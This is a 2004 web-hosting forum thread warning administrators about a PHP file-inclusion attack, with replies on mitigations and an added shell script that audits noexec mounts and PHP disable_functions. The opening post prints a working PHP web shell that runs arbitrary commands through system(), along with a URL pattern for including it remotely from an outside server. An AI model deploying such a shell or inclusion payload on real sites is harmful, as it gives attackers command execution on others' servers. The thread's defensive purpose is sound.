The Community Forums


Secure your /tmp partitions!

Discussion in 'General Discussion' started by amdmachine, Mar 15, 2004.

  1. amdmachine

    Secure your /tmp and /var/tmp partitions, people. Seems like a PHP injection exploit is now floating around which is very easy to use and exploit on a website that allows PHP files to be called locally.

    Code: hack.php
    Code:
    <br><font face="verdana" size="2"><center><bCOMMAND BUG PHP EXPLOIT !!</b><br></center></font><font face="Verdana" size="1"></center><br>
    <b>#</b> COMMAND BUG PHP EXPLOIT !!: <br>
    <b>#</b>Created By : <b>F4lcon16</b><br>
    <br>#</b>Email: <b>F4lcon16@linuxmail.org</b><br>
    <br>
    <hr color="black" width=751px height=115px>
    <br>
    <pre><font face="Verdana" size="1">
    <?
      // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
      if (isset($chdir)) @chdir($chdir);
      ob_start();
      system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
      $output = ob_get_contents();
      ob_end_clean();
      if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
    ?>
    </font></pre>
    <br>
    <hr color="black" width=751px height=115px>
    <br>
    <font face="Verdana" size="1"><b># F4lcon16</b><br><b>@ </b>f4lcon16@linuxmail.org<br><b># </b>
    It's called remotely like this:
    Code:
    http://yoursite.onyourserver.com/index.php=http://remote.server.com/hack.php?&cmd=shell%20commands%20here
    A correctly configured partition setup (not allowing execute permissions on /tmp) will stop scripts from being executed.
     
  2. nickn

    Just for those who aren't sure how...

    With cPanel it's as easy as running /scripts/securetmp
     
  3. InternetPEI

    Thanks :)
     
  4. Jeewhizz

    You should also be disabling certain functions like system and exec in PHP as default ;)
     
  5. hostultra

    The noexec thing on /tmp does mean you are invulnerable
    They can still run "sh /tmp/whatever" and it will execute
     
  6. nickn

    It's not perfect, but it's better than nothing.
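
An added example, not part of the thread or of cPanel's own scripts: a POSIX shell audit of the two mitigations the posts mention, a noexec mount covering /tmp and /var/tmp, and `system` and `exec` listed in PHP's `disable_functions`. It checks both because, as noted above, noexec alone does not stop `sh /tmp/whatever`. The function names and the two file arguments are illustrative assumptions.

```shell
#!/bin/sh
# Added example: audit noexec on temp directories and PHP's disable_functions.

# mount_opts MOUNTS_FILE DIR: print the mount options that apply to DIR, taken
# from the longest mount point containing it (file is in /proc/mounts format).
mount_opts() {
    awk -v dir="$2" '
        BEGIN { best = 0 }
        $2 == dir || $2 == "/" || index(dir, $2 "/") == 1 {
            if (length($2) >= best) { best = length($2); opts = $4 }
        }
        END { print opts }
    ' "$1"
}

# has_item LIST ITEM: true only on an exact match in the comma-separated LIST,
# so "shell_exec" in the list does not count as "exec".
has_item() {
    case ",$1," in *",$2,"*) return 0 ;; *) return 1 ;; esac
}

# php_disabled PHP_INI: print the last disable_functions value, minus spaces and quotes.
php_disabled() {
    sed -n 's/^[[:space:]]*disable_functions[[:space:]]*=//p' "$1" | tail -n 1 | tr -d ' "\t'
}

# audit MOUNTS_FILE PHP_INI: print one line per finding; exit status is the finding count.
audit() {
    findings=0
    for dir in /tmp /var/tmp; do
        if ! has_item "$(mount_opts "$1" "$dir")" noexec; then
            echo "FINDING: $dir is not on a noexec mount"
            findings=$((findings + 1))
        fi
    done
    disabled=$(php_disabled "$2")
    for fn in system exec; do
        if ! has_item "$disabled" "$fn"; then
            echo "FINDING: PHP function $fn is not in disable_functions"
            findings=$((findings + 1))
        fi
    done
    return "$findings"
}

# Runs only when both paths are given, e.g.: sh audit.sh /proc/mounts /path/to/php.ini
if [ "$#" -eq 2 ]; then audit "$1" "$2"; fi
```

The php.ini location differs between builds, so pass the path that your PHP installation actually loads.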
     